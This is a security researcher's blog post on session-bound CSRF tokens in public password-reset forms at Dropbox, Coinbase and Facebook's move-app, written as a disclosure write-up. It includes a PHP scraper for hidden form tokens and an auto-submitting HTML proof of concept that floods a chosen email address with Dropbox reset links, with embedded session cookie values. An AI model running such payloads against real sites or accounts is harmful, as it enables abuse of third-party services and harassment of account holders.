Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user’s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. – Wikipedia
I had an interesting encounter with CSRF last week; one of the issues is yet to be fixed. Here is an interesting low-impact issue.
These days almost every form on a website uses CSRF protection by default. Every time the page loads, the CSRF token should be different, unique and unpredictable (a per-request token, as opposed to a token that is only unique per session). But this is not the case with 80% of websites out there. I'll explain this with two examples: one is Dropbox and the other is move-app (Facebook).
Let’s start.
Most dynamic websites have sign-in functionality as well as a forgot-password form to recover the account.
"Most forgot-password forms are vulnerable by design; a good practice is to ask a security question before sending the reset link" – Aditya
My area of interest was the CSRF token on public, unauthenticated forms: reset password, sign in, feedback and so on. These tokens are session based: the session starts when the site loads and lasts until you close the browser.
The issue was that the token remains the same for a particular session. For example, when you submit a reset-password request the first time the token is x, and every subsequent reset-password request in that session carries the same x.
I thought I'd abuse this: I wrote a PHP crawler to scrape the hidden CSRF value and add it as a token field to my own CSRF form. Here is the PHP code to extract all the input values from Coinbase's password-reset page.
<?php
// Fetch the password-reset page and dump the value of every <input>,
// which includes the hidden CSRF token field.
// Note: loadHTMLFile() makes its own HTTP request, so any session cookie the
// server sets in that response is discarded; only the page body is kept.
$doc = new DOMDocument();
@$doc->loadHTMLFile("https://www.coinbase.com/password_resets/new"); // @ silences warnings about malformed HTML
$tags = $doc->getElementsByTagName('input');
foreach ($tags as $tag) {
    // value attribute | text content, one input per line
    $x = $tag->getAttribute('value') . '|' . $tag->nodeValue . "\n";
    echo $x;
}
?>
I tried to submit my form with the scraped CSRF token. Badass idea, but it didn't work, because my page was not creating any session: the token is bound to the session cookie that the crawler's request received, and the browser submitting my form never had that cookie.
Now the goal was clear: I had to use my own session to abuse the CSRF check. So I copied my cookie and token, set the cookie with document.cookie and pasted the token value into the form, and this time, bingo!
In the case of Dropbox, they have a js_csrf key in the cookie that contains the CSRF value. A full POC for Dropbox is below. Go to the forgot-password page, copy the cookie and the token, then replace the cookie and token in the POC with yours and use it for as long as you don't close the browser.
<html>
<head><title>test</title></head>
<body>
<script>
document.cookie="locale=en; gvc=MjY5NTY5NDI1ODg1MjkwOTc5MjU4MTMwMDAwMjQzNTA1ODg0NDM%3D; t=JK3SHAeVr2aKEoysoY5vSTOZ; js_csrf=AI2FTNdJcwJ9rgv-uA_Um_Bi; _ga=GA1.2.1136221818.1422608131; _dc_gtm_UA-279179-2=1; __ar_v4=D33PO2KM7ZEHNI2NW5CGWR%3A20150201%3A4%7C56766LR465ARRDJLPT63JW%3A20150201%3A4%7CU7C3RGPYVFBRPNTVQLPXAB%3A20150201%3A4; _gali=page-content"
</script>
<form action="https://www.dropbox.com/forgot" method="post" name="manish">
<input type="hidden" name="t" value="AI2FTNdJcwJ9rgv-uA_Um_Bi" />
<input type="hidden" name="confirm" value="go" id="action" />
<input type="hidden" name="is_reset" value="False" id="action" />
<input type="hidden" id="pyxl4173474534052041227" name="email" value="xyz@gmail.com" />
</form>
<script>
document.manish.submit();
</script>
</body>
</html>
The CSRF token is stored in a cookie, so change the email field to any known email associated with a Dropbox account and every time you reload this page that address will get a reset link. One caveat: a page on another origin cannot set cookies for www.dropbox.com, so the document.cookie line only has an effect because the POC is opened in the browser that already holds your Dropbox session; the browser attaches those Dropbox cookies to the cross-site POST on its own (in browsers that do not default cookies to SameSite), and that is what makes the token and session match.
In the case of move-app there was no CSRF field in the cookie, but the token was still session (cookie) based. The same POC works for move-app, except that they don't store a CSRF field in the cookie.
So what's the big deal? In this case I can use my own session to bypass the CSRF protection and send any number of reset links (Burp Repeater is the other option, but Burp has some setting issue with most RoR applications).
Dropbox, Facebook, Asana, Coinbase and a lot more have confirmed the issue, but they said it is low priority. They marked it Won't Fix and I went down a few ranks on HackerOne.
The issue affects almost 80% of websites, and most of them answer that they have a rate-limiting scheme. Then why is CSRF protection used on these forms at all?
HackerOne's implementation is the standard CSRF token implementation: every time a page loads you get a new CSRF token. Any other possibility to abuse this?
@umenmactech